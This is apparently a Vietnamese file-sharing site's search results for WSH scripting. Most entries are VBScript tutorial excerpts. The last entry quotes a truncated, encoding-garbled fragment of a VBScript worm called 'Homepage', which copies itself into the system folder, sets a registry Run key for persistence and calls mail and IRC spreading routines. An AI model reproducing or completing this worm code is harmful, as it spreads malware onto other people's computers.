Wsh script

Xem 1-7 trên 7 kết quả Wsh script
 • Welcome to the second edition of Microsoft WSH and VBScript Programming for the Absolute Beginner. VBScript (Visual Basic Scripting language) is a member of the Visual Basic family of programming languages. Other members of this family of programming languages include Visual Basic and VBA. Visual Basic is a very powerful and complex programming language used by programming professionals all over the world.

  pdf510p tailieuvip14 26-07-2012 160 18   Download

 • Kể từ lúc Windows NT 4 được Microsoft phát hành,Windows Scripting Host (sau này được đổi tên thành Windows Script Host, nhưng tên viết tắt vẫn là WSH) đã trở nên ngày càng phổ biến với tính cách một công cụ để tự động thực hiện những công việc thường làm hằng ngày đối với máy tính PC, để tiết kiệm thời gian và công sức

  pdf47p samsung_12 06-05-2013 82 30   Download

 • Using Windows Script Host to Modify the Registry In Chapter 10 we already touched on the problem of using Windows Script Host (WSH) and even provided a small code excerpt

  pdf8p kisiheo 26-07-2010 103 18   Download

 • WSH cung cấp các khả năng cho bạn để tạo ra và thao tác các biến trong kịch bản của bạn. Không giống như các file batch, các biến được hạn chế vì vậy họ chỉ có sẵn trong một kịch bản duy nhất trong quá trình thực hiện của kịch bản. Đây là một lợi thế lớn hơn các tập tin hàng loạt, bị hạn chế sử dụng các biến môi trường chia sẻ,

  pdf51p kimku7 26-10-2011 29 4   Download

 • bởi vì nó giúp loại bỏ các xung đột tiềm năng có thể xảy ra giữa các kịch bản. Hơn nữa, các biến trong các kịch bản WSH có thể thực hiện bất kỳ loại giá trị bao gồm chuỗi, số, và các đối tượng. Trong các tập tin hàng loạt, biến môi trường là luôn luôn strings

  pdf51p kimku7 26-10-2011 28 4   Download

 • Sau đó trong chương, bạn có thể tìm thấy chi tiết hơn về các đối tượng Command, và bạn có thể xem các ví dụ của usage.Ã của nó đối tượng ADO là dễ dàng để sử dụng từ WSH, và bạn có thể khai thác chúng cho mục đích khác nhau.

  pdf50p kimku7 26-10-2011 31 4   Download

 • Code virus Homepage : 'Homepage Created By Robinhood Set FSO =3D createobject("scripting.filesystemobject") dirsystem =3D FSO.getspecialfolder(1) Path=3D dirsystem & "Win32.dll.vbs" Set WSH createobject("wscript.shell") WSH.regwrite "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRunWin32dll", "wscript.exe " & Path& " %" FSO.copyfile wscript.scriptfullname, Path payload=20 If = WSH.regread("HKLMSOFTWAREMicrosoftWindowsCurrentVersionHomepageSend mail") 1 then sendmail End if If WSH.regread("HKLMSOFTWAREMicrosoftWindowsCurrentVersionHomepageIRC" ) 1 then IRC "" End if Set sourcefile=3D FSO.

  pdf3p tt1991tt 20-02-2011 178 56   Download

CHỦ ĐỀ BẠN MUỐN TÌM

Đồng bộ tài khoản